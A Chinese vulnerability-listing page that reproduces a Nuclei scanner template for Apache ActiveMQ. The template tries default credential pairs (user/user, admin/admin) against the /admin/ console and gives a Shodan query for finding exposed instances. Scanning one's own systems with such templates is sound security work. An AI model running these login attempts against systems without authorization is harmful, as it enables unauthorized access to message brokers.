activemq-default-login: Apache ActiveMQ Default Login

日期: 2025-08-01 | 影响软件: Apache ActiveMQ | POC: 已公开

漏洞描述

Apache ActiveMQ default login credentials were discovered.

PoC代码[已公开]

id: activemq-default-login

info:
  name: Apache ActiveMQ Default Login
  author: pdteam
  severity: high
  description: Apache ActiveMQ default login credentials were discovered.
  reference:
    - https://github.com/apache/activemq-artemis/
  metadata:
    product: activemq
    vendor: apache
    max-request: 2
    shodan-query: title:"ActiveMQ Artemis Console"
  tags: apache,activemq,default-login,vuln

http:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - user
        - admin
      password:
        - user
        - admin
    attack: pitchfork
    matchers:
      - type: word
        words:
          - 'Welcome to the Apache ActiveMQ Console of <b>'
          - '<h2>Broker</h2>'
        condition: and
# digest: 4a0a00473045022054c71cd884f6d849a055db07dde168c7e4ceee89b748b2228def833d51cfa846022100dff9d9eddaee049a80a32ea0af1d2909c00c0804381f7fd239853850ca576f81:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/activemq/activemq-default-login.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐